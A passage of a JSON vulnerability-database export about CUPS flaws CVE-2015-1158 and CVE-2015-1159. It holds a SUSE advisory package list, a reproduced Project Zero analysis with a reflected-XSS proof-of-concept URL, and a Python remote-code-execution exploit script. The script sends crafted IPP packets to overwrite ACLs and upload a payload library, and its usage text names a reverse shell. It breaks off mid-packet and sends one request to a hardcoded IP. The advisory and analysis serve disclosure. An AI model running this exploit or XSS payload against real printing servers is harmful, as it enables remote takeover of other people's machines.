Enterprise Desktop", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-libs-debuginfo", "packageFilename": "cups-libs-debuginfo-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-client", "packageFilename": "cups-client-1.7.5-9.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-client-debuginfo", "packageFilename": "cups-client-debuginfo-1.7.5-9.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-devel", "packageFilename": "cups-devel-1.7.5-9.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-libs-debuginfo", "packageFilename": "cups-libs-debuginfo-1.7.5-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-debugsource", "packageFilename": "cups-debugsource-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-libs-32bit", "packageFilename": "cups-libs-32bit-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-debugsource", "packageFilename": "cups-debugsource-1.7.5-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-libs", "packageFilename": "cups-libs-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-client", "packageFilename": "cups-client-1.7.5-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-debugsource", "packageFilename": "cups-debugsource-1.7.5-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-client-debuginfo", "packageFilename": "cups-client-debuginfo-1.7.5-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-libs", "packageFilename": "cups-libs-1.7.5-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-debuginfo", "packageFilename": "cups-debuginfo-1.7.5-9.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-client", "packageFilename": "cups-client-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-libs", "packageFilename": "cups-libs-1.7.5-9.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-debugsource", "packageFilename": "cups-debugsource-1.7.5-9.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-libs-debuginfo", "packageFilename": "cups-libs-debuginfo-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-debuginfo", "packageFilename": "cups-debuginfo-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-libs-32bit", "packageFilename": "cups-libs-32bit-1.7.5-9.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-libs-32bit", "packageFilename": "cups-libs-32bit-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-libs-debuginfo-32bit", "packageFilename": "cups-libs-debuginfo-32bit-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups", "packageFilename": "cups-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-debuginfo", "packageFilename": "cups-debuginfo-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-libs-debuginfo-32bit", "packageFilename": "cups-libs-debuginfo-32bit-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-client", "packageFilename": "cups-client-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups", "packageFilename": "cups-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-devel", "packageFilename": "cups-devel-1.7.5-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-libs-debuginfo", "packageFilename": "cups-libs-debuginfo-1.7.5-9.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-debugsource", "packageFilename": "cups-debugsource-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-libs-debuginfo-32bit", "packageFilename": "cups-libs-debuginfo-32bit-1.7.5-9.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-debuginfo", "packageFilename": "cups-debuginfo-1.7.5-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-debuginfo", "packageFilename": "cups-debuginfo-1.7.5-9.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-debuginfo", "packageFilename": "cups-debuginfo-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}], "description": "The following issues are fixed by this update:\n\n * CVE-2012-5519: privilege escalation via cross-site scripting and bad\n print job submission used to replace cupsd.conf on server (bsc#924208).\n * CVE-2015-1158: Improper Update of Reference Count\n * CVE-2015-1159: Cross-Site Scripting\n\n", "edition": 1, "reporter": "Suse", "published": "2015-06-11T17:05:04", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "suse", "title": "Security update for cups (critical)", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2012-5519", "CVE-2015-1159"], "modified": "2015-06-11T17:05:04", "id": "SUSE-SU-2015:1041-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00003.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2017-12-31T21:02:32", "references": [], "description": "Exploit for multiple platform in category remote exploits", "edition": 2, "reporter": "Google Security Research", "published": "2015-06-23T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "CUPS 2.0.3 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158"], "modified": "2015-06-23T00:00:00", "id": "1337DAY-ID-23782", "href": "https://0day.today/exploit/description/23782", "sourceData": "Source: http://googleprojectzero.blogspot.se/2015/06/owning-internet-printing-case-study-in.html\r\n \r\nAbstract\r\n \r\nModern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers.\r\n \r\nDespite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation.\r\n \r\nIn this blog post, I describe an exploit chain for several bugs I discovered in CUPS, an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation.\r\n \r\nBy publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same.\r\n \r\nSummary\r\n \r\nCupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle ACL's protecting privileged operations, upload a replacement configuration file, then run arbitrary code.\r\n \r\nThe reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface.\r\n \r\nExploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit mitigations.\r\nBackground\r\n \r\nImproper Teardown - Reference Count Over-Decrement (CVE-2015-1158)\r\n \r\nWhen freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'.\r\n \r\nscheduler/ipp.c:1626:\r\n \r\n /*\r\n * Free old strings\u2026 \u2190 Even 'old' strings need to be freed.\r\n */\r\n \r\n for (i = 0; i < attr->num_values; i ++)\r\n {\r\n _cupsStrFree(attr->values[i].string.text);\r\n attr->values[i].string.text = NULL;\r\n if (attr->values[i].string.language) \u2190 for all values in an attribute\r\n {\r\n _cupsStrFree(attr->values[i].string.language); \u2190 free the 'language' string\r\n attr->values[i].string.language = NULL;\r\n }\r\n }\r\n \r\nIn this case, 'language' field comes from the value of the 'attributes-natural-language' attribute in the request.\r\n \r\nTo specifically target a string and free it, we send a 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times.\r\n \r\nThe over-decrement prematurely frees the heap block for the target string. The actual block address will be quickly re-used by subsequent allocations.\r\n \r\nDangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build.\r\n \r\n \r\nA Reflected XSS in the Web Interface (CVE-2015-1159)\r\n \r\nThe template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'.\r\n \r\nThe template engine has 2 special cases for 'href' attributes from HTML links. The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting.\r\n \r\nThe code is found in 'cgi_puts()', and escapes the following reserved HTML characters:\r\n<>\"'&\r\n \r\n These are replaced with their HTML entity equivalents ('<' etc...).\r\n \r\nThe function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650:\r\n \r\n if (*s == '<')\r\n {\r\n /*\r\n * Pass <A HREF=\"url\"> and </A>, otherwise quote it...\r\n */\r\n \r\n if (!_cups_strncasecmp(s, \"<A HREF=\\\"\", 9))\r\n {\r\n fputs(\"<A HREF=\\\"\", out);\r\n s += 9;\r\n \r\n while (*s && *s != '\\\"')\r\n {\r\n if (*s == '&')\r\n fputs(\"&\", out);\r\n else\r\n putc(*s, out);\r\n \r\n s ++;\r\n }\r\n \r\n if (*s)\r\n s ++;\r\n \r\n fputs(\"\\\">\", out);\r\n }\r\n \r\nFor variable values containing '<a href=\"', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. The characters <>', and a closing \" would normally be escaped, but are echoed unaltered in this context.\r\n \r\nNote that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. However, the template engine's limited context-awareness becomes an issue.\r\n \r\nTake this example from templates/help-header.tmp:19:\r\n \r\n <P CLASS=\"l0\"><A HREF=\"/help/{QUERY??QUERY={QUERY}:}\">All Documents</A></P>\r\n \r\nIn this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href=\"', the double-quote will close the 'href' attribute opened in the static portion of the template. The remainder of the 'QUERY' variable will be interpreted as HTML tags.\r\n \r\nRequesting the following URI will demonstrate this reflected XSS:\r\nhttp://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search\r\n \r\nThe 'QUERY' parametre is included in the page twice, leading to multiple unbalanced double-quotes. As such, the open comment string '<!--' is used to yield a HTML page that parses without errors.\r\n \r\n \r\nUpstream Fixes\r\n \r\nApple Fix (April 16, 2015):\r\nhttps://support.apple.com/kb/DL1807\r\n \r\nOfficial CUPS fix for downstream vendors (June 8, 2015):\r\nhttps://www.cups.org/str.php?L4609\r\nhttp://www.cups.org/blog.php?L1082+I0+Q\r\n \r\nProject Zero Bug\r\n \r\nFor those interested, the sample exploit can be found here:\r\n \r\nhttps://code.google.com/p/google-security-research/issues/detail?id=455\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37336.tar.gz\r\n \r\nDisclosure Timeline\r\n \r\nMarch 20th, 2015 - Initial notification to Apple\r\nApril 16th, 2015 - Apple ships fix in Mac OS X 10.10.3\r\nJune 8th, 2015 - CUPS ships official fix in CUPS 2.0.3\r\nJune 18th, 2015 - Disclosure + 90 days\r\nJune 19th, 2015 - P0 publication\r\n \r\nAttack Surface Reduction in CUPS 2.0.3+\r\n \r\nCUPS 2.0.3 and 2.1 beta contains several prescient implementation changes to limit the risk and impact of future similar bugs:\r\n \r\nConfiguration value strings are now logically separated from the string pool, allocated by strdup() instead.\r\nLD_* and DYLD_* environment variables are blocked when CUPS is running as root.\r\nThe localhost listener is removed when 'WebInterface' is disabled (2.1 beta only).\r\n \r\nAcknowledgements\r\n \r\nThanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits.\r\n \r\nConclusion\r\n \r\nNo one prints anything anymore anyways.\n\n# 0day.today [2017-12-31] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23782"}, {"lastseen": "2018-01-08T23:03:57", "references": [], "description": "Exploit for linux platform in category remote exploits", "edition": 1, "reporter": "@0x00string", "published": "2017-02-03T00:00:00", "title": "CUPS 2.0.3 - Remote Command Execution Exploit", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158"], "modified": "2017-02-03T00:00:00", "href": "https://0day.today/exploit/description/26891", "id": "1337DAY-ID-26891", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution\r\n# Google Dork: n/a\r\n# Date: 2/2/17\r\n# Exploit Author: @0x00string\r\n# Vendor Homepage: cups.org\r\n# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2\r\n# Version: <2.0.3\r\n# Tested on: Ubuntu 14/15\r\n# CVE : CVE-2015-1158\r\nimport os, re, socket, random, time, getopt, sys\r\nfrom socket import *\r\nfrom struct import *\r\n \r\ndef banner():\r\n print '''\r\n lol ty google\r\n 0000000000000\r\n 0000000000000000000 00\r\n 00000000000000000000000000000\r\n 0000000000000000000000000000000\r\n 000000000 0000000000\r\n 00000000 0000000000\r\n 0000000 000000000000\r\n 0000000 000000000000000\r\n 000000 000000000 000000\r\n0000000 000000000 000000\r\n000000 000000000 000000\r\n000000 000000000 000000\r\n000000 00000000 000000\r\n000000 000000000 000000\r\n0000000 000000000 0000000\r\n 000000 000000000 000000\r\n 0000000000000000 0000000\r\n 0000000000000 0000000\r\n 00000000000 00000000\r\n 00000000000 000000000\r\n 0000000000000000000000000000000\r\n 00000000000000000000000000000\r\n 000 0000000000000000000\r\n 0000000000000\r\n @0x00string\r\ngithub.com/0x00string/oldays/CVE-2015-1158.py\r\n'''\r\n \r\ndef usage ():\r\n print (\"python script.py <args>\\n\"\r\n \" -h, --help: Show this message\\n\"\r\n \" -a, --rhost: Target IP address\\n\"\r\n \" -b, --rport: Target IPP service port\\n\"\r\n \" -c, --lib /path/to/payload.so\\n\"\r\n \" -f, --stomp-only Only stomp the ACL (no postex)\\n\"\r\n \"\\n\"\r\n \"Examples:\\n\"\r\n \"python script.py -a 10.10.10.10 -b 631 -f\\n\"\r\n \"python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\\n\")\r\n exit()\r\n \r\ndef pretty (t, m):\r\n if (t is \"+\"):\r\n print \"\\x1b[32;1m[+]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"-\"):\r\n print \"\\x1b[31;1m[-]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"*\"):\r\n print \"\\x1b[34;1m[*]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"!\"):\r\n print \"\\x1b[33;1m[!]\\x1b[0m\\t\" + m + \"\\n\",\r\n \r\ndef createDump (input):\r\n d, b, h = '', [], []\r\n u = list(input)\r\n for e in u:\r\n h.append(e.encode(\"hex\"))\r\n if e == '0x0':\r\n b.append('0')\r\n elif 30 > ord(e) or ord(e) > 128:\r\n b.append('.')\r\n elif 30 < ord(e) or ord(e) < 128:\r\n b.append(e)\r\n \r\n i = 0\r\n while i < len(h):\r\n if (len(h) - i ) >= 16:\r\n d += ' '.join(h[i:i+16])\r\n d += \" \"\r\n d += ' '.join(b[i:i+16])\r\n d += \"\\n\"\r\n i = i + 16\r\n else:\r\n d += ' '.join(h[i:(len(h) - 0 )])\r\n pad = len(' '.join(h[i:(len(h) - 0 )]))\r\n d += ' ' * (56 - pad)\r\n d += ' '.join(b[i:(len(h) - 0 )])\r\n d += \"\\n\"\r\n i = i + len(h)\r\n \r\n return d\r\n \r\nclass tcpsock:\r\n def __init__(self, sock=None):\r\n if sock is None:\r\n self.sock = socket(\r\n AF_INET, SOCK_STREAM)\r\n self.sock.settimeout(30)\r\n else:\r\n self.sock = sock\r\n def connect(self, host, port):\r\n self.sock.connect((host, int(port)))\r\n def tx(self, msg):\r\n self.sock.send(msg)\r\n def rx(self):\r\n tmp = self.sock.recv(1024)\r\n msg = \"\"\r\n while tmp:\r\n msg += tmp\r\n tmp = self.sock.recv(1024)\r\n return msg\r\n \r\ndef txrx (ip, port, proto, txpacket):\r\n if (proto is \"tcp\"):\r\n sock = tcpsock()\r\n elif (proto is \"udp\"):\r\n sock = udpsock()\r\n else:\r\n return None\r\n sock.connect(ip, port)\r\n sock.tx(txpacket)\r\n rxpacket = sock.rx()\r\n return rxpacket\r\n \r\ndef locatePrinters(rhost, rport=\"631\"):\r\n request = ( \"GET /printers HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n response = txrx(rhost, int(rport), \"tcp\", request)\r\n if response is not None:\r\n m = re.search('<TR><TD><A HREF=\"(.+)\">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response)\r\n if m is not None:\r\n printer = m.group(1)\r\n pretty(\"+\",\"printer found: \" + printer)\r\n else:\r\n pretty(\"-\",\"no printers\")\r\n exit(1)\r\n return printer\r\n \r\ndef preparePayload(libpath):\r\n with open(libpath, 'rb') as f:\r\n payload = f.read()\r\n if payload is not None:\r\n pretty(\"*\",\"Payload:\\n\" + createDump(payload))\r\n else:\r\n pretty(\"-\",\"something went wrong\")\r\n usage()\r\n return payload\r\n \r\ndef seedTarget(rhost, rport, printer, payload):\r\n i = random.randint(1,3)\r\n reqid = str(pack(\">i\",(i+2)))\r\n reqid2 = str(pack(\">i\",(i+3)))\r\n printer_uri = \"ipp://\" + rhost + \":\" + str(rport) + printer\r\n \r\n create_job_packet = (\"\\x02\\x00\"\r\n \"\\x00\\x05\"+\r\n reqid+\r\n \"\\x01\"\r\n \"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\"\r\n \"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\"\r\n \"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri +\r\n \"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\"\r\n \"\\x42\"+\"\\x00\\x08\"+\"job-name\"+\"\\x00\\x06\"+\"badlib\"\r\n \"\\x02\"\r\n \"\\x21\"+\"\\x00\\x06\"+\"copies\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\"\r\n \"\\x23\"+\"\\x00\\x0a\"+\"finishings\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x03\"\r\n \"\\x42\"+\"\\x00\\x10\"+\"job-cancel-after\"+\"\\x00\\x05\"+\"\\x31\\x30\\x38\\x30\\x30\"\r\n \"\\x44\"+\"\\x00\\x0e\"+\"job-hold-until\"+\"\\x00\\x0a\"+\"indefinite\"\r\n \"\\x21\"+\"\\x00\\x0c\"+\"job-priority\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x32\"\r\n \"\\x42\"+\"\\x00\\x0a\"+\"job-sheets\"+\"\\x00\\x04\"+\"none\"+\"\\x42\"+\"\\x00\\x00\\x00\\x04\"+\"none\"\r\n \"\\x21\"+\"\\x00\\x09\"+\"number-up\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\"\r\n \"\\x03\")\r\n pretty(\"*\",\"Sending createJob\")\r\n \r\n http_header1 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(create_job_packet) + 0) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n \r\n createJobRequest = http_header1 + create_job_packet\r\n blah = txrx(rhost,int(rport),\"tcp\",createJobRequest)\r\n if blah is not None:\r\n m = re.search(\"ipp://\" + rhost + \":\" + str(rport) + \"/jobs/(\\d+)\",blah)\r\n if m is not None:\r\n jobid = m.group(1)\r\n else:\r\n pretty(\"-\",\"something went wrong\");\r\n exit()\r\n \r\n pretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\")\r\n pretty(\"*\", \"Sending sendJob\")\r\n \r\n send_document_packet = (\"\\x02\\x00\"\r\n \"\\x00\\x06\"+\r\n reqid2+\r\n \"\\x01\"\r\n \"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\"\r\n \"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\"\r\n \"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri +\r\n \"\\x21\"+\"\\x00\\x06\"+\"job-id\"+\"\\x00\\x04\"+ str(pack(\">i\", int(jobid))) +\r\n \"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\"\r\n \"\\x42\"+\"\\x00\\x0d\"+\"document-name\"+\"\\x00\\x06\"+\"badlib\"\r\n \"\\x49\"+\"\\x00\\x0f\"+\"document-format\"+\"\\x00\\x18\"+\"application/octet-stream\"\r\n \"\\x22\"+\"\\x00\\x0d\"+\"last-document\"+\"\\x00\\x01\"+\"\\x01\"\r\n \"\\x03\"+\r\n payload)\r\n \r\n http_header2 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(send_document_packet) + 0) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n \r\n sendJobRequest = http_header2 + send_document_packet\r\n blah2 = txrx(\"172.20.32.3\",631,\"tcp\",sendJobRequest)\r\n pretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\")\r\n pretty(\"*\",\"job id: \" + jobid)\r\n return jobid\r\n \r\ndef stompACL(rhost, rport, printer):\r\n i = random.randint(1,1024)\r\n printer_url = \"ipp://\" + rhost + \":\" + rport + printer\r\n \r\n admin_stomp = (\"\\x02\\x00\" # vers 2.0\r\n \"\\x00\\x05\"+ # op id: Create Job (0x0005)\r\n str(pack(\">i\",(i+1)))+\r\n \"\\x01\" # op attributes marker\r\n \"\\x47\" # charset\r\n \"\\x00\\x12\" # name len: 18\r\n \"attributes-charset\"\r\n \"\\x00\\x08\" # val len: 8\r\n \"us-ascii\"\r\n \"\\x48\" # natural language\r\n \"\\x00\\x1b\" # name len: 27\r\n \"attributes-natural-language\"\r\n \"\\x00\\x06\" # val len: 6\r\n \"/admin\"\r\n \"\\x45\" # printer-uri\r\n \"\\x00\\x0b\" # name len 11\r\n \"printer-uri\" +\r\n str(pack(\">h\", len(printer_url))) + printer_url +\r\n \"\\x42\" # name without lang\r\n \"\\x00\\x14\" # name len: 20\r\n \"requesting-user-name\"\r\n \"\\x00\\x06\" # val len: 6\r\n \"/admin\"\r\n \"\\x02\" # job attrs marker\r\n \"\\x21\" # integer\r\n \"\\x00\\x06\" # name len: 6\r\n \"copies\"\r\n \"\\x00\\x04\" # val len: 4\r\n \"\\x00\\x00\\x00\\x01\" # 1\r\n \"\\x42\" # name w/o lang\r\n \"\\x00\\x19\" # name len: 25\r\n \"job-originating-host-name\"\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n 